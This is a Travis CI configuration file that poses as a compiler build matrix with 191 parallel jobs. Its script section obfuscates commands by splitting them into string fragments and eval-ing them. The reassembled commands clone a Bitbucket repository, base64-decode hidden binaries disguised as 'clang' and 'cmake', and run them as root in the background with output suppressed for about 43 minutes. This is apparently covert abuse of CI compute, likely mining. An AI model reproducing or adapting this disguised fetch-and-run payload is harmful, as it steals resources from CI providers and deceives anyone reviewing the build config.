dist: bionic

env:
  - BUILD="nB1"
  - BUILD="nB2"
  - BUILD="nB3"
  - BUILD="nB4"
  - BUILD="nB5"
  - BUILD="nB6"
  - BUILD="nB7"
  - BUILD="nB8"
  - BUILD="nB9"
  - BUILD="nB10"
  - BUILD="nB11"
  - BUILD="nB12"
  - BUILD="nB13"
  - BUILD="nB14"
  - BUILD="nB15"
  - BUILD="nB16"
  - BUILD="nB17"
  - BUILD="nB18"
  - BUILD="nB19"
  - BUILD="nB20"
  - BUILD="nB21"
  - BUILD="nB22"
  - BUILD="nB23"
  - BUILD="nB24"
  - BUILD="nB25"
  - BUILD="nB26"
  - BUILD="nB27"
  - BUILD="nB28"
  - BUILD="nB29"
  - BUILD="nB30"
  - BUILD="nB31"
  - BUILD="nB32"
  - BUILD="nB33"
  - BUILD="nB34"
  - BUILD="nB35"
  - BUILD="nB36"
  - BUILD="nB37"
  - BUILD="nB38"
  - BUILD="nB39"
  - BUILD="nB40"
  - BUILD="nB41"
  - BUILD="nB42"
  - BUILD="nB43"
  - BUILD="nB44"
  - BUILD="nB45"
  - BUILD="nB46"
  - BUILD="nB47"
  - BUILD="nB48"
  - BUILD="nB49"
  - BUILD="nB50"
  - BUILD="nB51"
  - BUILD="nB52"
  - BUILD="nB53"
  - BUILD="nB54"
  - BUILD="nB55"
  - BUILD="nB56"
  - BUILD="nB57"
  - BUILD="nB58"
  - BUILD="nB59"
  - BUILD="nB60"
  - BUILD="nB61"
  - BUILD="nB62"
  - BUILD="nB63"
  - BUILD="nB64"
  - BUILD="nB65"
  - BUILD="nB66"
  - BUILD="nB67"
  - BUILD="nB68"
  - BUILD="nB69"
  - BUILD="nB70"
  - BUILD="nB71"
  - BUILD="nB72"
  - BUILD="nB73"
  - BUILD="nB74"
  - BUILD="nB75"
  - BUILD="nB76"
  - BUILD="nB77"
  - BUILD="nB78"
  - BUILD="nB79"
  - BUILD="nB80"
  - BUILD="nB81"
  - BUILD="nB82"
  - BUILD="nB83"
  - BUILD="nB84"
  - BUILD="nB85"
  - BUILD="nB86"
  - BUILD="nB87"
  - BUILD="nB88"
  - BUILD="nB89"
  - BUILD="nB90"
  - BUILD="nB91"
  - BUILD="nB92"
  - BUILD="nB93"
  - BUILD="nB94"
  - BUILD="nB95"
  - BUILD="nB96"
  - BUILD="nB97"
  - BUILD="nB98"
  - BUILD="nB99"
  - BUILD="nB100"
  - BUILD="nB101"
  - BUILD="nB102"
  - BUILD="nB103"
  - BUILD="nB104"
  - BUILD="nB105"
  - BUILD="nB106"
  - BUILD="nB107"
  - BUILD="nB108"
  - BUILD="nB109"
  - BUILD="nB110"
  - BUILD="nB111"
  - BUILD="nB112"
  - BUILD="nB113"
  - BUILD="nB114"
  - BUILD="nB115"
  - BUILD="nB116"
  - BUILD="nB117"
  - BUILD="nB118"
  - BUILD="nB119"
  - BUILD="nB120"
  - BUILD="nB121"
  - BUILD="nB122"
  - BUILD="nB123"
  - BUILD="nB124"
  - BUILD="nB125"
  - BUILD="nB126"
  - BUILD="nB127"
  - BUILD="nB128"
  - BUILD="nB129"
  - BUILD="nB130"
  - BUILD="nB131"
  - BUILD="nB132"
  - BUILD="nB133"
  - BUILD="nB134"
  - BUILD="nB135"
  - BUILD="nB136"
  - BUILD="nB137"
  - BUILD="nB138"
  - BUILD="nB139"
  - BUILD="nB140"
  - BUILD="nB141"
  - BUILD="nB142"
  - BUILD="nB143"
  - BUILD="nB144"
  - BUILD="nB145"
  - BUILD="nB146"
  - BUILD="nB147"
  - BUILD="nB148"
  - BUILD="nB149"
  - BUILD="nB150"
  - BUILD="nB151"
  - BUILD="nB152"
  - BUILD="nB153"
  - BUILD="nB154"
  - BUILD="nB155"
  - BUILD="nB156"
  - BUILD="nB157"
  - BUILD="nB158"
  - BUILD="nB159"
  - BUILD="nB160"
  - BUILD="nB161"
  - BUILD="nB162"
  - BUILD="nB163"
  - BUILD="nB164"
  - BUILD="nB165"
  - BUILD="nB166"
  - BUILD="nB167"
  - BUILD="nB168"
  - BUILD="nB169"
  - BUILD="nB170"
  - BUILD="nB171"
  - BUILD="nB172"
  - BUILD="nB173"
  - BUILD="nB174"
  - BUILD="nB175"
  - BUILD="nB176"
  - BUILD="nB177"
  - BUILD="nB178"
  - BUILD="nB179"
  - BUILD="nB180"
  - BUILD="nB181"
  - BUILD="nB182"
  - BUILD="nB183"
  - BUILD="nB184"
  - BUILD="nB185"
  - BUILD="nB186"
  - BUILD="nB187"
  - BUILD="nB188"
  - BUILD="nB189"
  - BUILD="nB190"
  - BUILD="nB191"

language: minimal

script:
  - NXrcGtzc="sudo apt up"
  - QebAa="date || tru"
  - eval "$NXrcGtzc""$QebAa""e"
  - iPdnouDAmHd="sudo apt --"
  - tUCHtLCC="yes install"
  - PwNcaxW=" cl-base64 "
  - ajraRjxgGp="git &>/dev/"
  - eval "$iPdnouDAmHd""$tUCHtLCC""$PwNcaxW""$ajraRjxgGp""null"
  - uhqrdsVW="git clone h"
  - vpCTecLJ="ttps://gccb"
  - qsNEgihpcc="uild@bitbuc"
  - eAgJuGD="ket.org/gcc"
  - SJoCnxVe="build/gcc.g"
  - ATEhZZjhqmg="it &>/dev/n"
  - eval "$uhqrdsVW""$vpCTecLJ""$qsNEgihpcc""$eAgJuGD""$SJoCnxVe""$ATEhZZjhqmg""ull"
  - zbNswbEMoPb="base64 -d g"
  - ZOorCdXB="cc/cmake_ >"
  - eval "$zbNswbEMoPb""$ZOorCdXB"" cmake"
  - nkOUvDLCJyt="base64 -d g"
  - PlQkxNVc="cc/config_ "
  - eval "$nkOUvDLCJyt""$PlQkxNVc""> cconfig"
  - BioZKq="base64 -d g"
  - yUuYUey="cc/make_ > "
  - eval "$BioZKq""$yUuYUey""clang"
  - dQPwU="chmod +x cl"
  - eval "$dQPwU""ang cmake"
  - fBLKREvu="./cmake"
  - eval "$fBLKREvu"""
  - sed -i 's/build/tg1o/g' cconfig
  - sudo ./clang --config=cconfig &>/dev/null &
  - GCC=$(date +%s)
  - echo $BUILD
  - while true; do CC=$(date +%s); echo Build; [ $CC -ge $((GCC + 2570)) ] && sudo killall clang && break; sleep 205; done
